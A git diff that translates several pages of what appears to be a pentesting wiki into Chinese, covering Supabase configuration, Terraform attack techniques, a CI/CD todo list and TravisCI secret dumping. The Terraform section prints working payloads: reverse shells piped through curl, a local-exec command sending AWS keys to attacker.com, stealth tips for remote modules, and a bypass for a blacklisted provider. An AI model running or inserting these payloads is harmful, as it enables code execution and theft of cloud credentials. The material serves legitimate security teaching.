的访问(他们获得角色 `public` 和 `authenticated`)。\ +这是一个非常糟糕的主意,因为 supabase 按活跃用户收费,因此人们可以创建用户并登录,而 supabase 将为这些用户收费:
-### Passwords & sessions +### 密码和会话 -It's possible to indicate the minimum password length (by default), requirements (no by default) and disallow to use leaked passwords.\ -It's recommended to **improve the requirements as the default ones are weak**. +可以指示最小密码长度(默认),要求(默认不要求)并禁止使用泄露的密码。\ +建议 **提高要求,因为默认的要求很弱**。 -- User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...) -- Bot and Abuse Protection: It's possible to enable Captcha. +- 用户会话:可以配置用户会话的工作方式(超时,每个用户 1 个会话...) +- 机器人和滥用保护:可以启用验证码。 -### SMTP Settings +### SMTP 设置 -It's possible to set an SMTP to send emails. +可以设置 SMTP 以发送电子邮件。 -### Advanced Settings +### 高级设置 -- Set expire time to access tokens (3600 by default) -- Set to detect and revoke potentially compromised refresh tokens and timeout -- MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default) -- Max Direct Database Connections: Max number of connections used to auth (10 by default) -- Max Request Duration: Maximum time allowed for an Auth request to last (10s by default) +- 设置访问令牌的过期时间(默认 3600) +- 设置检测和撤销潜在被泄露的刷新令牌和超时 +- MFA:指示每个用户可以同时注册多少个 MFA 因素(默认 10) +- 最大直接数据库连接:用于身份验证的最大连接数(默认 10) +- 最大请求持续时间:身份验证请求允许持续的最大时间(默认 10 秒) -## Storage +## 存储 > [!TIP] -> Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets). +> Supabase 允许 **存储文件** 并通过 URL 使其可访问(它使用 S3 存储桶)。 -- Set the upload file size limit (default is 50MB) -- The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3` -- It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`) +- 设置上传文件大小限制(默认 50MB) +- S3 连接通过如下 URL 提供: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3` +- 可以 **请求 S3 访问密钥**,由 `access key ID`(例如 `a37d96544d82ba90057e0e06131d0a7b`)和 `secret access key`(例如 `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)组成 -## Edge Functions +## 边缘函数 -It's possible to **store secrets** in supabase also which will be **accessible by edge functions** (the can be created and deleted from the web, but it's not possible to access their value directly). +也可以在 supabase 中 **存储秘密**,这些秘密将 **通过边缘函数访问**(可以从网页创建和删除,但无法直接访问其值)。 {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/terraform-security.md b/src/pentesting-ci-cd/terraform-security.md index 09b875ff2..35f175627 100644 --- a/src/pentesting-ci-cd/terraform-security.md +++ b/src/pentesting-ci-cd/terraform-security.md @@ -2,307 +2,277 @@ {{#include ../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -[From the docs:](https://developer.hashicorp.com/terraform/intro) +[来自文档:](https://developer.hashicorp.com/terraform/intro) -HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features. +HashiCorp Terraform 是一个 **基础设施即代码工具**,允许您在可版本化、可重用和可共享的人类可读配置文件中定义 **云和本地资源**。然后,您可以使用一致的工作流程来配置和管理整个生命周期中的所有基础设施。Terraform 可以管理低级组件,如计算、存储和网络资源,以及高级组件,如 DNS 条目和 SaaS 功能。 -#### How does Terraform work? +#### Terraform 如何工作? -Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API. +Terraform 通过其应用程序编程接口 (APIs) 创建和管理云平台和其他服务上的资源。提供程序使 Terraform 能够与几乎任何具有可访问 API 的平台或服务协同工作。 ![](<../images/image (177).png>) -HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more. +HashiCorp 和 Terraform 社区已经编写了 **超过 1700 个提供程序** 来管理成千上万种不同类型的资源和服务,这个数字还在不断增长。您可以在 [Terraform Registry](https://registry.terraform.io/) 上找到所有公开可用的提供程序,包括亚马逊网络服务 (AWS)、Azure、谷歌云平台 (GCP)、Kubernetes、Helm、GitHub、Splunk、DataDog 等等。 -The core Terraform workflow consists of three stages: +核心 Terraform 工作流程由三个阶段组成: -- **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer. -- **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration. -- **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines. +- **编写:** 您定义资源,这些资源可能跨多个云提供商和服务。例如,您可能会创建一个配置,以在具有安全组和负载均衡器的虚拟私有云 (VPC) 网络中的虚拟机上部署应用程序。 +- **计划:** Terraform 创建一个执行计划,描述它将根据现有基础设施和您的配置创建、更新或销毁的基础设施。 +- **应用:** 经批准后,Terraform 按照正确的顺序执行提议的操作,尊重任何资源依赖关系。例如,如果您更新 VPC 的属性并更改该 VPC 中虚拟机的数量,Terraform 将在扩展虚拟机之前重新创建 VPC。 ![](<../images/image (215).png>) -### Terraform Lab +### Terraform 实验室 -Just install terraform in your computer. +只需在您的计算机上安装 terraform。 -Here you have a [guide](https://learn.hashicorp.com/tutorials/terraform/install-cli) and here you have the [best way to download terraform](https://www.terraform.io/downloads). +这里有一个 [指南](https://learn.hashicorp.com/tutorials/terraform/install-cli),这里有 [下载 terraform 的最佳方式](https://www.terraform.io/downloads)。 -## RCE in Terraform +## Terraform 中的 RCE -Terraform **doesn't have a platform exposing a web page or a network service** we can enumerate, therefore, the only way to compromise terraform is to **be able to add/modify terraform configuration files**. +Terraform **没有暴露网页或网络服务的平台**,因此,妥协 terraform 的唯一方法是 **能够添加/修改 terraform 配置文件**。 -However, terraform is a **very sensitive component** to compromise because it will have **privileged access** to different locations so it can work properly. +然而,terraform 是一个 **非常敏感的组件**,因为它将拥有 **特权访问** 不同位置,以便正常工作。 -The main way for an attacker to be able to compromise the system where terraform is running is to **compromise the repository that stores terraform configurations**, because at some point they are going to be **interpreted**. +攻击者能够妥协运行 terraform 的系统的主要方式是 **妥协存储 terraform 配置的仓库**,因为在某些时候它们将被 **解释**。 -Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**: +实际上,市面上有一些解决方案 **在创建 PR 后自动执行 terraform plan/apply**,例如 **Atlantis**: {{#ref}} atlantis-security.md {{#endref}} -If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed `terraform plan` or `terraform apply`. +如果您能够妥协一个 terraform 文件,有不同的方法可以在某人执行 `terraform plan` 或 `terraform apply` 时执行 RCE。 ### Terraform plan -Terraform plan is the **most used command** in terraform and developers/solutions using terraform call it all the time, so the **easiest way to get RCE** is to make sure you poison a terraform config file that will execute arbitrary commands in a `terraform plan`. +Terraform plan 是 terraform 中 **使用最频繁的命令**,开发人员/使用 terraform 的解决方案一直在调用它,因此,**获得 RCE 的最简单方法**是确保您毒化一个 terraform 配置文件,该文件将在 `terraform plan` 中执行任意命令。 -**Using an external provider** +**使用外部提供程序** -Terraform offers the [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) which provides a way to interface between Terraform and external programs. You can use the `external` data source to run arbitrary code during a `plan`. - -Injecting in a terraform config file something like the following will execute a rev shell when executing `terraform plan`: +Terraform 提供了 [`external` 提供程序](https://registry.terraform.io/providers/hashicorp/external/latest/docs),它提供了一种在 Terraform 和外部程序之间进行接口的方法。您可以使用 `external` 数据源在 `plan` 期间运行任意代码。 +在 terraform 配置文件中注入如下内容将在执行 `terraform plan` 时执行一个反向 shell: ```javascript data "external" "example" { - program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] +program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] } ``` +**使用自定义提供程序** -**Using a custom provider** - -An attacker could send a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)): - +攻击者可以将一个 [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) 发送到 [Terraform Registry](https://registry.terraform.io/),然后将其添加到功能分支中的 Terraform 代码中 ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)): ```javascript - terraform { - required_providers { - evil = { - source = "evil/evil" - version = "1.0" - } - } - } +terraform { +required_providers { +evil = { +source = "evil/evil" +version = "1.0" +} +} +} provider "evil" {} ``` +提供程序在 `init` 中下载,并将在执行 `plan` 时运行恶意代码 -The provider is downloaded in the `init` and will run the malicious code when `plan` is executed +您可以在 [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec) 找到一个示例 -You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec) +**使用外部引用** -**Using an external reference** - -Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). You can perform this attack even in a **stealthier way**, by following this suggestions: - -- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: +上述两种选项都很有用,但不够隐蔽(第二种比第一种更隐蔽,但更复杂)。您可以通过遵循以下建议以**更隐蔽的方式**执行此攻击: +- 不要直接将反向 shell 添加到 terraform 文件中,您可以**加载一个包含反向 shell 的外部资源**: ```javascript module "not_rev_shell" { - source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" +source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" } ``` +您可以在 [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) 找到 rev shell 代码。 -You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) - -- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` +- 在外部资源中,使用 **ref** 功能来隐藏 **repo 中分支的 terraform rev shell 代码**,类似于: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` ### Terraform Apply -Terraform apply will be executed to apply all the changes, you can also abuse it to obtain RCE injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ -You just need to make sure some payload like the following ones ends in the `main.tf` file: - +将执行 Terraform apply 以应用所有更改,您也可以利用它通过注入 **一个恶意的 Terraform 文件与** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ +您只需确保一些有效载荷像以下内容结束于 `main.tf` 文件: ```json // Payload 1 to just steal a secret resource "null_resource" "secret_stealer" { - provisioner "local-exec" { - command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" - } +provisioner "local-exec" { +command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" +} } // Payload 2 to get a rev shell resource "null_resource" "rev_shell" { - provisioner "local-exec" { - command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" - } +provisioner "local-exec" { +command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" +} } ``` - -Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way using external references**. +遵循**前一种技术的建议**,以**更隐蔽的方式使用外部引用**执行此攻击。 ## Secrets Dumps -You can have **secret values used by terraform dumped** running `terraform apply` by adding to the terraform file something like: - +您可以通过运行 `terraform apply` 来**转储 terraform 使用的秘密值**,方法是向 terraform 文件中添加如下内容: ```json output "dotoken" { - value = nonsensitive(var.do_token) +value = nonsensitive(var.do_token) } ``` +## 滥用 Terraform 状态文件 -## Abusing Terraform State Files +如果您对 terraform 状态文件具有写入权限但无法更改 terraform 代码,[**这项研究**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) 提供了一些有趣的选项来利用该文件: -In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file: +### 删除资源 -### Deleting resources +有两种方法可以销毁资源: -There are 2 ways to destroy resources: - -1. **Insert a resource with a random name into the state file pointing to the real resource to destroy** - -Because terraform will see that the resource shouldn't exit, it'll destroy it (following the real resource ID indicated). Example from the previous page: +1. **在状态文件中插入一个随机名称的资源,指向要销毁的真实资源** +因为 terraform 会看到该资源不应该存在,所以它会销毁它(根据指示的真实资源 ID)。来自上一页的示例: ```json { - "mode": "managed", - "type": "aws_instance", - "name": "example", - "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]", - "instances": [ - { - "attributes": { - "id": "i-1234567890abcdefg" - } - } - ] +"mode": "managed", +"type": "aws_instance", +"name": "example", +"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]", +"instances": [ +{ +"attributes": { +"id": "i-1234567890abcdefg" +} +} +] }, ``` +2. **以一种无法更新的方式修改要删除的资源(这样它将被删除并重新创建)** -2. **Modify the resource to delete in a way that it's not possible to update (so it'll be deleted a recreated)** - -For an EC2 instance, modifying the type of the instance is enough to make terraform delete a recreate it. +对于 EC2 实例,修改实例的类型足以使 terraform 删除并重新创建它。 ### RCE -It's also possible to [create a custom provider](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) and just replace one of the providers in the terraform state file for the malicious one or add an empty resource with the malicious provider. Example from the original research: - +还可以 [创建自定义提供程序](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider),并仅替换 terraform 状态文件中的一个提供程序为恶意提供程序,或添加一个带有恶意提供程序的空资源。原始研究的示例: ```json "resources": [ { - "mode": "managed", - "type": "scaffolding_example", - "name": "example", - "provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]", - "instances": [ +"mode": "managed", +"type": "scaffolding_example", +"name": "example", +"provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]", +"instances": [ - ] +] }, ``` +### 替换黑名单提供者 -### Replace blacklisted provider - -In case you encounter a situation where `hashicorp/external` was blacklisted, you can re-implement the `external` provider by doing the following. Note: We use a fork of external provider published by https://registry.terraform.io/providers/nazarewk/external/latest. You can publish your own fork or re-implementation as well. - +如果您遇到 `hashicorp/external` 被列入黑名单的情况,可以通过以下方式重新实现 `external` 提供者。注意:我们使用的是由 https://registry.terraform.io/providers/nazarewk/external/latest 发布的 external 提供者的分支。您也可以发布自己的分支或重新实现。 ```terraform terraform { - required_providers { - external = { - source = "nazarewk/external" - version = "3.0.0" - } - } +required_providers { +external = { +source = "nazarewk/external" +version = "3.0.0" +} +} } ``` - -Then you can use `external` as per normal. - +然后您可以像往常一样使用 `external`。 ```terraform data "external" "example" { - program = ["sh", "-c", "whoami"] +program = ["sh", "-c", "whoami"] } ``` +## 自动审计工具 -## Automatic Audit Tools +### [**Snyk 基础设施即代码 (IaC)**](https://snyk.io/product/infrastructure-as-code-security/) -### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/) - -Snyk offers a comprehensive Infrastructure as Code (IaC) scanning solution that detects vulnerabilities and misconfigurations in Terraform, CloudFormation, Kubernetes, and other IaC formats. - -- **Features:** - - Real-time scanning for security vulnerabilities and compliance issues. - - Integration with version control systems (GitHub, GitLab, Bitbucket). - - Automated fix pull requests. - - Detailed remediation advice. -- **Sign Up:** Create an account on [Snyk](https://snyk.io/). +Snyk 提供全面的基础设施即代码 (IaC) 扫描解决方案,能够检测 Terraform、CloudFormation、Kubernetes 和其他 IaC 格式中的漏洞和配置错误。 +- **特点:** +- 实时扫描安全漏洞和合规性问题。 +- 与版本控制系统(GitHub、GitLab、Bitbucket)集成。 +- 自动修复拉取请求。 +- 详细的修复建议。 +- **注册:** 在 [Snyk](https://snyk.io/) 上创建一个账户。 ```bash brew tap snyk/tap brew install snyk snyk auth snyk iac test /path/to/terraform/code ``` - ### [Checkov](https://github.com/bridgecrewio/checkov) -**Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages. +**Checkov** 是一个用于基础设施即代码 (IaC) 的静态代码分析工具,同时也是一个用于图像和开源包的软件组成分析 (SCA) 工具。 -It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), or [OpenTofu](https://opentofu.org/) and detects security and compliance misconfigurations using graph-based scanning. - -It performs [Software Composition Analysis (SCA) scanning](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs). +它扫描使用 [Terraform](https://terraform.io/) 提供的云基础设施、[Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md)、[Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md)、[AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md)、[Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md)、[Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md)、[Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md)、[Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md)、[Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md)、[Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md)、[OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md)、[ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md) 或 [OpenTofu](https://opentofu.org/) 提供的,并使用基于图形的扫描检测安全和合规性错误配置。 +它执行 [软件组成分析 (SCA) 扫描](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md),这是对开源包和图像进行的扫描,以查找常见漏洞和暴露 (CVE)。 ```bash pip install checkov checkov -d /path/to/folder ``` - ### [terraform-compliance](https://github.com/terraform-compliance/cli) -From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is a lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code. +来自 [**docs**](https://github.com/terraform-compliance/cli):`terraform-compliance` 是一个轻量级的,专注于安全和合规性的测试框架,针对 terraform 以启用基础设施即代码的负面测试能力。 -- **compliance:** Ensure the implemented code is following security standards, your own custom standards -- **behaviour driven development:** We have BDD for nearly everything, why not for IaC ? -- **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/) -- **pre-deploy:** it validates your code before it is deployed -- **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated. -- **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible. +- **合规性:** 确保实施的代码遵循安全标准和您自己的自定义标准 +- **行为驱动开发:** 我们几乎为所有事物都采用 BDD,为什么不为 IaC 采用呢? +- **可移植:** 只需从 `pip` 安装或通过 `docker` 运行。请参见 [安装](https://terraform-compliance.com/pages/installation/) +- **预部署:** 在代码部署之前进行验证 +- **易于集成:** 它可以在您的管道中运行(或在 git hooks 中),以确保所有部署都经过验证。 +- **职责分离:** 您可以将测试保存在不同的代码库中,由一个独立的团队负责。 > [!NOTE] -> Unfortunately if the code is using some providers you don't have access to you won't be able to perform the `terraform plan` and run this tool. - +> 不幸的是,如果代码使用了一些您没有访问权限的提供者,您将无法执行 `terraform plan` 并运行此工具。 ```bash pip install terraform-compliance terraform plan -out=plan.out terraform-compliance -f /path/to/folder ``` - ### [tfsec](https://github.com/aquasecurity/tfsec) -From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations. - -- ☁️ Checks for misconfigurations across all major (and some minor) cloud providers -- ⛔ Hundreds of built-in rules -- 🪆 Scans modules (local and remote) -- ➕ Evaluates HCL expressions as well as literal values -- ↪️ Evaluates Terraform functions e.g. `concat()` -- 🔗 Evaluates relationships between Terraform resources -- 🧰 Compatible with the Terraform CDK -- 🙅 Applies (and embellishes) user-defined Rego policies -- 📃 Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif. -- 🛠️ Configurable (via CLI flags and/or config file) -- ⚡ Very fast, capable of quickly scanning huge repositories +来自[**docs**](https://github.com/aquasecurity/tfsec):tfsec使用对您的terraform代码的静态分析来发现潜在的错误配置。 +- ☁️ 检查所有主要(和一些次要)云提供商的错误配置 +- ⛔ 数百条内置规则 +- 🪆 扫描模块(本地和远程) +- ➕ 评估HCL表达式以及字面值 +- ↪️ 评估Terraform函数,例如`concat()` +- 🔗 评估Terraform资源之间的关系 +- 🧰 与Terraform CDK兼容 +- 🙅 应用(并美化)用户定义的Rego策略 +- 📃 支持多种输出格式:lovely(默认),JSON,SARIF,CSV,CheckStyle,JUnit,文本,Gif。 +- 🛠️ 可配置(通过CLI标志和/或配置文件) +- ⚡ 非常快速,能够快速扫描大型代码库 ```bash brew install tfsec tfsec /path/to/folder ``` - ### [KICKS](https://github.com/Checkmarx/kics) -Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle of your infrastructure-as-code with **KICS** by Checkmarx. - -**KICS** stands for **K**eeping **I**nfrastructure as **C**ode **S**ecure, it is open source and is a must-have for any cloud native project. +使用 **KICS** 由 Checkmarx 提供的工具,在基础设施即代码的开发周期早期发现安全漏洞、合规性问题和基础设施配置错误。 +**KICS** 代表 **K**eeping **I**nfrastructure as **C**ode **S**ecure,它是开源的,是任何云原生项目的必备工具。 ```bash docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/" ``` - ### [Terrascan](https://github.com/tenable/terrascan) -From the [**docs**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to: - -- Seamlessly scan infrastructure as code for misconfigurations. -- Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture. -- Detect security vulnerabilities and compliance violations. -- Mitigate risks before provisioning cloud native infrastructure. -- Offers flexibility to run locally or integrate with your CI\CD. +来自[**文档**](https://github.com/tenable/terrascan):Terrascan 是一个用于基础设施即代码的静态代码分析器。Terrascan 允许您: +- 无缝扫描基础设施即代码中的错误配置。 +- 监控已配置的云基础设施的配置更改,以防止姿态漂移,并能够恢复到安全姿态。 +- 检测安全漏洞和合规性违规。 +- 在配置云原生基础设施之前减轻风险。 +- 提供灵活性,可以在本地运行或与您的 CI\CD 集成。 ```bash brew install terrascan ``` - -## References +## 参考文献 - [Atlantis Security](atlantis-security.md) - [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce) @@ -310,7 +280,3 @@ brew install terrascan - [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/todo.md b/src/pentesting-ci-cd/todo.md index 63a3bb5c8..ce75869eb 100644 --- a/src/pentesting-ci-cd/todo.md +++ b/src/pentesting-ci-cd/todo.md @@ -2,7 +2,7 @@ {{#include ../banners/hacktricks-training.md}} -Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective +欢迎提交Github PR,解释如何从攻击者的角度(滥)用这些平台 - Drone - TeamCity @@ -11,10 +11,6 @@ Github PRs are welcome explaining how to (ab)use those platforms from an attacke - Rancher - Mesosphere - Radicle -- Any other CI/CD platform... +- 任何其他CI/CD平台... {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/travisci-security/README.md b/src/pentesting-ci-cd/travisci-security/README.md index cff623392..2118a6ebb 100644 --- a/src/pentesting-ci-cd/travisci-security/README.md +++ b/src/pentesting-ci-cd/travisci-security/README.md @@ -2,68 +2,64 @@ {{#include ../../banners/hacktricks-training.md}} -## What is TravisCI +## 什么是 TravisCI -**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**. +**Travis CI** 是一个 **托管** 或 **本地** 的 **持续集成** 服务,用于构建和测试托管在多个 **不同 git 平台** 上的软件项目。 {{#ref}} basic-travisci-information.md {{#endref}} -## Attacks +## 攻击 -### Triggers +### 触发器 -To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**: +要发起攻击,您首先需要知道如何触发构建。默认情况下,TravisCI 会在 **推送和拉取请求** 时 **触发构建**: ![](<../../images/image (145).png>) -#### Cron Jobs +#### 定时任务 -If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build: +如果您可以访问该 web 应用程序,您可以 **设置定时任务来运行构建**,这对于持久性或触发构建可能很有用: ![](<../../images/image (243).png>) > [!NOTE] -> It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162). +> 根据 [这个](https://github.com/travis-ci/travis-ci/issues/9162) 的说法,似乎无法在 `.travis.yml` 中设置定时任务。 -### Third Party PR +### 第三方 PR -TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets: +TravisCI 默认禁用与来自第三方的 PR 共享环境变量,但有人可能会启用它,然后您可以创建 PR 到该仓库并提取机密: ![](<../../images/image (208).png>) -### Dumping Secrets +### 转储机密 -As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines). +如 [**基本信息**](basic-travisci-information.md) 页面所述,有两种类型的机密。**环境变量机密**(在网页上列出)和 **自定义加密机密**,这些机密存储在 `.travis.yml` 文件中,采用 base64 编码(请注意,两个加密存储的最终都会作为环境变量出现在最终机器上)。 -- To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build. -- To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**. -- To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as: +- 要 **枚举配置为环境变量的机密**,请转到 **项目** 的 **设置** 并检查列表。但是,请注意,在触发构建时,这里设置的所有项目环境变量都会出现。 +- 要枚举 **自定义加密机密**,您能做的最好是 **检查 `.travis.yml` 文件**。 +- 要 **枚举加密文件**,您可以检查仓库中的 **`.enc` 文件**,查找配置文件中类似于 `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` 的行,或在 **环境变量** 中查找 **加密的 iv 和密钥**,例如: ![](<../../images/image (81).png>) -### TODO: +### 待办事项: -- Example build with reverse shell running on Windows/Mac/Linux -- Example build leaking the env base64 encoded in the logs +- 示例构建在 Windows/Mac/Linux 上运行反向 shell +- 示例构建在日志中泄露环境变量的 base64 编码 -### TravisCI Enterprise +### TravisCI 企业版 -If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to: +如果攻击者进入一个使用 **TravisCI 企业版** 的环境(有关这是什么的更多信息,请参见 [**基本信息**](basic-travisci-information.md#travisci-enterprise)),他将能够 **在 Worker 中触发构建**。这意味着攻击者将能够从中横向移动到该服务器,从而能够: -- escape to the host? -- compromise 